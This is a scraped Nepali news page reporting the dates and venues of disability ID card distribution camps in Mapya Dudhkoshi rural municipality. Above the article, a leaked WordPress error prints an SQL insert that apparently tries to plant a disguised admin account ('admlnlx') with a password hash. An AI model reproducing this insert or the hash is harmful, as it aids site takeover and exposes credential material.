WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUXhMVQJuhXtaa0b8OyYjYWCjRD6hb/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 11:14:28', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशीको सात वटै वडामा अपांगता परिचयपत्र वितरण शिविर हुने – Gaule Khabar

माप्य दुधकोशीको सात वटै वडामा अपांगता परिचयपत्र वितरण शिविर हुने

माप्य दुधकोशीको सात वटै वडामा अपांगता परिचयपत्र वितरण शिविर हुने

काठमाण्डौ । सोलुखुम्बु माप्यदुधकोशी गाउपालिकाको ७ वटै वडामा अपाङ्गता परिचयपत्र वितरण शिविर सञ्चालन हुने भएको छ । अपांगता भएकाहरुलाई परिचयपत्र वितरण गर्न गाउपालिकाले यहि पुस १४ गते देखि १९ गतेसम्म शिबिर सञ्चालन गर्न लागेको उपाध्यक्ष जुनीतामाया मगरले जानकारी दिए । उनका अनुसार शिबिरमा सेवा लिन आउँदा तिन पुस्ते विवरण, अपांगता झल्किने फोटो सहित स्वयम ब्यतिm उपिस्थत हुनुपर्ने छ ।

गाउपालिकाको महिला तथा बालबालिका शाखाले सञ्चालन गर्ने शिविरमा पुस १४ गते वडा नम्बर ७ का लागि वडा कार्यालय हाकुला, १५ गते वडा नम्बर ६ का लागि वाकु स्वास्थ्य चौकी, वडा नम्बर ४ र ५ का लागि १७ गते कोफु स्वास्थ्य चौकी, वडा नम्बर १ र २ का लागि १८ गते अधेरी हेली प्याड र वडा नम्बर ३ का लागि पौष १९ गते खास्ताब स्वास्थ्य चौकीमा सञ्चालन हुने गाउँपालिका उपाध्यक्ष उपाध्यक्ष जनीता माया मगरले जानकारी दिए ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका